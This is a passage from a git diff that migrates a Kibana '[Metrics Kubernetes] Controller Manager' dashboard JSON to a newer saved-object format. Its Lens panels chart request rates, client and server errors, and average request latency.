"adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "7c7c4b67-a2df-427f-abbd-635e5fa73a9c": { - "columnOrder": [ - "d3b90051-0bb2-41e0-9d5d-34ff145dba09", - "8a2e9cea-60fb-4603-a072-9b0e6194344c", - "63268365-bb35-456f-831c-78238984a061", - "63268365-bb35-456f-831c-78238984a061X0", - "63268365-bb35-456f-831c-78238984a061X1", - "24a01536-55c3-4c11-b62e-20a2a5435663", - "24a01536-55c3-4c11-b62e-20a2a5435663X1", - "24a01536-55c3-4c11-b62e-20a2a5435663X0", - "1028ba4a-0d68-4d8d-8340-f7a2966f546d", - "1028ba4a-0d68-4d8d-8340-f7a2966f546dX1", - "1028ba4a-0d68-4d8d-8340-f7a2966f546dX0" - ], - "columns": { - "1028ba4a-0d68-4d8d-8340-f7a2966f546d": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.code \u003e= 500" - }, - "isBucketed": false, - "label": "Server errors", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "formula": "counter_rate(last_value(kubernetes.controllermanager.client.request.count))", - "isFormulaBroken": false - }, - "references": [ - "1028ba4a-0d68-4d8d-8340-f7a2966f546dX1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "1028ba4a-0d68-4d8d-8340-f7a2966f546dX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.code \u003e= 500" - }, - "isBucketed": false, - "label": "Part of Server errors", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.client.request.count" - }, - "1028ba4a-0d68-4d8d-8340-f7a2966f546dX1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.code \u003e= 500" - }, - "isBucketed": false, - "label": "Part of Server errors", - "operationType": "counter_rate", - "references": [ - "1028ba4a-0d68-4d8d-8340-f7a2966f546dX0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "24a01536-55c3-4c11-b62e-20a2a5435663": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.code \u003e= 400 and kubernetes.controllermanager.code \u003c 500" - }, - "isBucketed": false, - "label": "Client errors", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "formula": "counter_rate(last_value(kubernetes.controllermanager.client.request.count))", - "isFormulaBroken": false - }, - "references": [ - "24a01536-55c3-4c11-b62e-20a2a5435663X1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "24a01536-55c3-4c11-b62e-20a2a5435663X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.code \u003e= 400 and kubernetes.controllermanager.code \u003c 500" - }, - "isBucketed": false, - "label": "Part of Client errors", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.client.request.count" - }, - "24a01536-55c3-4c11-b62e-20a2a5435663X1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.code \u003e= 400 and kubernetes.controllermanager.code \u003c 500" - }, - "isBucketed": false, - "label": "Part of Client errors", - "operationType": "counter_rate", - "references": [ - "24a01536-55c3-4c11-b62e-20a2a5435663X0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "63268365-bb35-456f-831c-78238984a061": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Requests", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "formula": "counter_rate(last_value(kubernetes.controllermanager.client.request.count))", - "isFormulaBroken": false - }, - "references": [ - "63268365-bb35-456f-831c-78238984a061X1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "63268365-bb35-456f-831c-78238984a061X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.client.request.count: *" - }, - "isBucketed": false, - "label": "Part of Requests", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.client.request.count" - }, - "63268365-bb35-456f-831c-78238984a061X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Requests", - "operationType": "counter_rate", - "references": [ - "63268365-bb35-456f-831c-78238984a061X0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "8a2e9cea-60fb-4603-a072-9b0e6194344c": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "10s" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "d3b90051-0bb2-41e0-9d5d-34ff145dba09": { - "dataType": "string", - "isBucketed": true, - "label": "Top values", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": false, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "kubernetes.controllermanager.method", - "kubernetes.controllermanager.code" - ], - "size": 3 - }, - "scale": "ordinal", - "sourceField": "kubernetes.controllermanager.host" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": false, + "parentFormat": { + "id": "multi_terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "692cad49-25ea-40b4-87d2-535b5f35ecd4", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.controllermanager" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.controllermanager" - } - } - } + "secondaryFields": [ + "kubernetes.controllermanager.method", + "kubernetes.controllermanager.code" ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "63268365-bb35-456f-831c-78238984a061", - "24a01536-55c3-4c11-b62e-20a2a5435663", - "1028ba4a-0d68-4d8d-8340-f7a2966f546d" - ], - "layerId": "7c7c4b67-a2df-427f-abbd-635e5fa73a9c", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "d3b90051-0bb2-41e0-9d5d-34ff145dba09", - "xAccessor": "8a2e9cea-60fb-4603-a072-9b0e6194344c" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "shouldTruncate": false - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "size": 3 + }, + "scale": "ordinal", + "sourceField": "kubernetes.controllermanager.host" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "692cad49-25ea-40b4-87d2-535b5f35ecd4", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.controllermanager" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.controllermanager" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 14, - "i": "91a7ce56-6a49-4b7e-837f-31c184b48c09", - "w": 24, - "x": 24, - "y": 70 + "layers": [ + { + "accessors": [ + "63268365-bb35-456f-831c-78238984a061", + "24a01536-55c3-4c11-b62e-20a2a5435663", + "1028ba4a-0d68-4d8d-8340-f7a2966f546d" + ], + "layerId": "7c7c4b67-a2df-427f-abbd-635e5fa73a9c", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "d3b90051-0bb2-41e0-9d5d-34ff145dba09", + "xAccessor": "8a2e9cea-60fb-4603-a072-9b0e6194344c" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "panelIndex": "91a7ce56-6a49-4b7e-837f-31c184b48c09", - "title": "Requests and responses counter rate", - "type": "lens", - "version": "8.6.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9": { - "columnOrder": [ - "35a11916-4ca3-421b-9df2-521f52f21fbb", - "ed3c7efa-0467-4a57-8d06-0f4775906cc5", - "43097f7a-e478-47bc-81c1-7541bd899d46", - "43097f7a-e478-47bc-81c1-7541bd899d46X0", - "43097f7a-e478-47bc-81c1-7541bd899d46X1", - "43097f7a-e478-47bc-81c1-7541bd899d46X2" - ], - "columns": { - "35a11916-4ca3-421b-9df2-521f52f21fbb": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Host", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "kubernetes.controllermanager.verb" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.controllermanager.host" - }, - "43097f7a-e478-47bc-81c1-7541bd899d46": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Average latency in ms", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "ms" - } - }, - "formula": "last_value(kubernetes.controllermanager.client.request.duration.us.sum)/last_value(kubernetes.controllermanager.client.request.duration.us.count)/1000", - "isFormulaBroken": false - }, - "references": [ - "43097f7a-e478-47bc-81c1-7541bd899d46X2" - ], - "scale": "ratio" - }, - "43097f7a-e478-47bc-81c1-7541bd899d46X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.client.request.duration.us.sum: *" - }, - "isBucketed": false, - "label": "Part of Average latency in ms", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.client.request.duration.us.sum" - }, - "43097f7a-e478-47bc-81c1-7541bd899d46X1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.client.request.duration.us.count: *" - }, - "isBucketed": false, - "label": "Part of Average latency in ms", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.client.request.duration.us.count" - }, - "43097f7a-e478-47bc-81c1-7541bd899d46X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Average latency in ms", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - { - "args": [ - "43097f7a-e478-47bc-81c1-7541bd899d46X0", - "43097f7a-e478-47bc-81c1-7541bd899d46X1" - ], - "name": "divide", - "type": "function" - }, - 1000 - ], - "location": { - "max": 150, - "min": 0 - }, - "name": "divide", - "text": "last_value(kubernetes.controllermanager.client.request.duration.us.sum)/last_value(kubernetes.controllermanager.client.request.duration.us.count)/1000", - "type": "function" - } - }, - "references": [ - "43097f7a-e478-47bc-81c1-7541bd899d46X0", - "43097f7a-e478-47bc-81c1-7541bd899d46X1" - ], - "scale": "ratio" - }, - "ed3c7efa-0467-4a57-8d06-0f4775906cc5": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "10s" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Requests and responses counter rate" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 13, + "i": "1bd24fa1-319e-4cae-9d45-d821b06a8034", + "w": 24, + "x": 0, + "y": 71 + }, + "panelIndex": "1bd24fa1-319e-4cae-9d45-d821b06a8034", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9": { + "columnOrder": [ + "35a11916-4ca3-421b-9df2-521f52f21fbb", + "ed3c7efa-0467-4a57-8d06-0f4775906cc5", + "43097f7a-e478-47bc-81c1-7541bd899d46", + "43097f7a-e478-47bc-81c1-7541bd899d46X0", + "43097f7a-e478-47bc-81c1-7541bd899d46X1", + "43097f7a-e478-47bc-81c1-7541bd899d46X2" + ], + "columns": { + "35a11916-4ca3-421b-9df2-521f52f21fbb": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Host", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "43097f7a-e478-47bc-81c1-7541bd899d46" - ], - "layerId": "f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", - "layerType": "data", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "35a11916-4ca3-421b-9df2-521f52f21fbb", - "xAccessor": "ed3c7efa-0467-4a57-8d06-0f4775906cc5", - "yConfig": [] - } - ], - "legend": { - "horizontalAlignment": "right", - "isInside": false, - "isVisible": true, - "legendSize": "large", - "maxLines": 1, - "position": "right", - "shouldTruncate": false, - "verticalAlignment": "bottom" + "secondaryFields": [ + "kubernetes.controllermanager.verb" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.controllermanager.host" + }, + "43097f7a-e478-47bc-81c1-7541bd899d46": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Average latency in ms", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "ms" + } + }, + "formula": "last_value(kubernetes.controllermanager.client.request.duration.us.sum)/last_value(kubernetes.controllermanager.client.request.duration.us.count)/1000", + "isFormulaBroken": false + }, + "references": [ + "43097f7a-e478-47bc-81c1-7541bd899d46X2" + ], + "scale": "ratio" + }, + "43097f7a-e478-47bc-81c1-7541bd899d46X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.client.request.duration.us.sum: *" + }, + "isBucketed": false, + "label": "Part of Average latency in ms", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.client.request.duration.us.sum" + }, + "43097f7a-e478-47bc-81c1-7541bd899d46X1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.client.request.duration.us.count: *" + }, + "isBucketed": false, + "label": "Part of Average latency in ms", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.client.request.duration.us.count" + }, + "43097f7a-e478-47bc-81c1-7541bd899d46X2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Average latency in ms", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + { + "args": [ + "43097f7a-e478-47bc-81c1-7541bd899d46X0", + "43097f7a-e478-47bc-81c1-7541bd899d46X1" + ], + "name": "divide", + "type": "function" }, - "preferredSeriesType": "area", - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": false, - "xTitle": "", - "yTitle": "" + 1000 + ], + "location": { + "max": 150, + "min": 0 + }, + "name": "divide", + "text": "last_value(kubernetes.controllermanager.client.request.duration.us.sum)/last_value(kubernetes.controllermanager.client.request.duration.us.count)/1000", + "type": "function" } + }, + "references": [ + "43097f7a-e478-47bc-81c1-7541bd899d46X0", + "43097f7a-e478-47bc-81c1-7541bd899d46X1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "ed3c7efa-0467-4a57-8d06-0f4775906cc5": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "10s" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 13, - "i": "1bd24fa1-319e-4cae-9d45-d821b06a8034", - "w": 24, - "x": 0, - "y": 71 + "layers": [ + { + "accessors": [ + "43097f7a-e478-47bc-81c1-7541bd899d46" + ], + "layerId": "f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", + "layerType": "data", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "35a11916-4ca3-421b-9df2-521f52f21fbb", + "xAccessor": "ed3c7efa-0467-4a57-8d06-0f4775906cc5", + "yConfig": [] + } + ], + "legend": { + "horizontalAlignment": "right", + "isInside": false, + "isVisible": true, + "legendSize": "large", + "maxLines": 1, + "position": "right", + "shouldTruncate": false, + "verticalAlignment": "bottom" }, - "panelIndex": "1bd24fa1-319e-4cae-9d45-d821b06a8034", - "title": "Average request latency", - "type": "lens", - "version": "8.6.0" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] Controller Manager", - "version": 1 - }, - "coreMigrationVersion": "8.6.0", - "created_at": "2023-01-11T16:15:05.999Z", - "id": "kubernetes-bf9389f0-0c14-11ed-b760-5d1bccb47f56", - "migrationVersion": { - "dashboard": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd:metrics_ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd_0_index_pattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "aef813b5-85d5-46c9-a86a-2e273806d488:indexpattern-datasource-layer-239b73ac-0fc9-44fd-a7c5-2d0281e6b765", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "0599e0ae-2375-4ceb-b12d-2ebec4310cc6:metrics_0599e0ae-2375-4ceb-b12d-2ebec4310cc6_0_index_pattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2ba53067-d43d-42eb-ac50-2d941977ce95:indexpattern-datasource-layer-76c85206-02c1-4f35-bb0d-c1d4d3ee59d7", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2ba53067-d43d-42eb-ac50-2d941977ce95:3ed2b7d8-6b77-43b7-8ed3-c52117016d59", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1cd3ebab-9630-4253-b9a6-5f921e5cb617:indexpattern-datasource-layer-77b347b2-91fa-470f-861d-ada0e175cbc4", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1cd3ebab-9630-4253-b9a6-5f921e5cb617:b460c8d2-ab24-41ed-aac8-998febec263b", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "3a26dffa-0696-485d-b991-1dbc5092082e:indexpattern-datasource-layer-2b80230c-9cc8-444f-b092-1fbc4d764992", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "3a26dffa-0696-485d-b991-1dbc5092082e:7e0ad24d-199f-4ede-8b71-90152913fa90", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "6a8b9a40-11ec-4790-a38d-2d88c5468f12:indexpattern-datasource-layer-a2facaed-7c02-4fb6-9126-5512b8ffd26f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "6a8b9a40-11ec-4790-a38d-2d88c5468f12:1c580aea-6c0f-4de6-9c30-f6b9a6964b0d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "c3fee68f-01c6-49da-a759-2900b1cd15bf:metrics_c3fee68f-01c6-49da-a759-2900b1cd15bf_0_index_pattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "75255ce8-2d49-4b4f-ac0e-a20fe8f4daec:indexpattern-datasource-layer-380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "75255ce8-2d49-4b4f-ac0e-a20fe8f4daec:daf730fb-a3b5-400a-acba-cff0c8ba607d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "303702e1-ba33-49f2-b337-4cc7d7305606:indexpattern-datasource-layer-77da5988-3f03-4e8f-b1e4-39a94d8bec07", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "303702e1-ba33-49f2-b337-4cc7d7305606:236aa40a-181f-4c61-af17-8df4ecba80d3", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1604f0de-edd6-456e-8670-ab9b33988abb:indexpattern-datasource-layer-d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1604f0de-edd6-456e-8670-ab9b33988abb:a781e55e-e2bc-4b36-b197-1b55842aeff7", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f8313a9d-ab58-448e-b183-75f914caf53f:metrics_f8313a9d-ab58-448e-b183-75f914caf53f_0_index_pattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "fd90adaf-517f-4b92-a5b5-c29f7a16663b:indexpattern-datasource-layer-1048fff9-f5a4-446b-8173-e9e22d4b1cff", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "fd90adaf-517f-4b92-a5b5-c29f7a16663b:11922ebb-686e-4ad0-a043-e425a0d2ce35", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "91a7ce56-6a49-4b7e-837f-31c184b48c09:indexpattern-datasource-layer-7c7c4b67-a2df-427f-abbd-635e5fa73a9c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "91a7ce56-6a49-4b7e-837f-31c184b48c09:692cad49-25ea-40b4-87d2-535b5f35ecd4", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1bd24fa1-319e-4cae-9d45-d821b06a8034:indexpattern-datasource-layer-f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_f53d0d21-4502-4dce-8004-017a92104040:optionsListDataView", - "type": "index-pattern" + "preferredSeriesType": "area", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": false, + "xTitle": "", + "yTitle": "" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "controlGroup_df56c430-83b1-436e-8b9c-fb027aaa29ca:optionsListDataView", - "type": "index-pattern" - } + "title": "Average request latency" + } ], - "type": "dashboard", - "updated_at": "2023-01-11T16:15:05.999Z", - "version": "WzM0NTEsMV0=" + "timeRestore": false, + "title": "[Metrics Kubernetes] Controller Manager", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd:metrics_ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "aef813b5-85d5-46c9-a86a-2e273806d488:indexpattern-datasource-layer-239b73ac-0fc9-44fd-a7c5-2d0281e6b765", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "0599e0ae-2375-4ceb-b12d-2ebec4310cc6:metrics_0599e0ae-2375-4ceb-b12d-2ebec4310cc6_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2ba53067-d43d-42eb-ac50-2d941977ce95:indexpattern-datasource-layer-76c85206-02c1-4f35-bb0d-c1d4d3ee59d7", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2ba53067-d43d-42eb-ac50-2d941977ce95:3ed2b7d8-6b77-43b7-8ed3-c52117016d59", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1cd3ebab-9630-4253-b9a6-5f921e5cb617:indexpattern-datasource-layer-77b347b2-91fa-470f-861d-ada0e175cbc4", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1cd3ebab-9630-4253-b9a6-5f921e5cb617:b460c8d2-ab24-41ed-aac8-998febec263b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3a26dffa-0696-485d-b991-1dbc5092082e:indexpattern-datasource-layer-2b80230c-9cc8-444f-b092-1fbc4d764992", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3a26dffa-0696-485d-b991-1dbc5092082e:7e0ad24d-199f-4ede-8b71-90152913fa90", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "6a8b9a40-11ec-4790-a38d-2d88c5468f12:indexpattern-datasource-layer-a2facaed-7c02-4fb6-9126-5512b8ffd26f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "6a8b9a40-11ec-4790-a38d-2d88c5468f12:1c580aea-6c0f-4de6-9c30-f6b9a6964b0d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c3fee68f-01c6-49da-a759-2900b1cd15bf:metrics_c3fee68f-01c6-49da-a759-2900b1cd15bf_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "75255ce8-2d49-4b4f-ac0e-a20fe8f4daec:indexpattern-datasource-layer-380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "75255ce8-2d49-4b4f-ac0e-a20fe8f4daec:daf730fb-a3b5-400a-acba-cff0c8ba607d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "303702e1-ba33-49f2-b337-4cc7d7305606:indexpattern-datasource-layer-77da5988-3f03-4e8f-b1e4-39a94d8bec07", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "303702e1-ba33-49f2-b337-4cc7d7305606:236aa40a-181f-4c61-af17-8df4ecba80d3", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1604f0de-edd6-456e-8670-ab9b33988abb:indexpattern-datasource-layer-d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1604f0de-edd6-456e-8670-ab9b33988abb:a781e55e-e2bc-4b36-b197-1b55842aeff7", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f8313a9d-ab58-448e-b183-75f914caf53f:metrics_f8313a9d-ab58-448e-b183-75f914caf53f_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "fd90adaf-517f-4b92-a5b5-c29f7a16663b:indexpattern-datasource-layer-1048fff9-f5a4-446b-8173-e9e22d4b1cff", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "fd90adaf-517f-4b92-a5b5-c29f7a16663b:11922ebb-686e-4ad0-a043-e425a0d2ce35", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "91a7ce56-6a49-4b7e-837f-31c184b48c09:indexpattern-datasource-layer-7c7c4b67-a2df-427f-abbd-635e5fa73a9c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "91a7ce56-6a49-4b7e-837f-31c184b48c09:692cad49-25ea-40b4-87d2-535b5f35ecd4", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1bd24fa1-319e-4cae-9d45-d821b06a8034:indexpattern-datasource-layer-f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_f53d0d21-4502-4dce-8004-017a92104040:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_df56c430-83b1-436e-8b9c-fb027aaa29ca:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56.json b/packages/kubernetes/kibana/dashboard/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56.json index 16596467da9..307ae49b656 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56.json @@ -1,737 +1,749 @@ { - "attributes": { - "description": "Kubernetes API server metrics", - 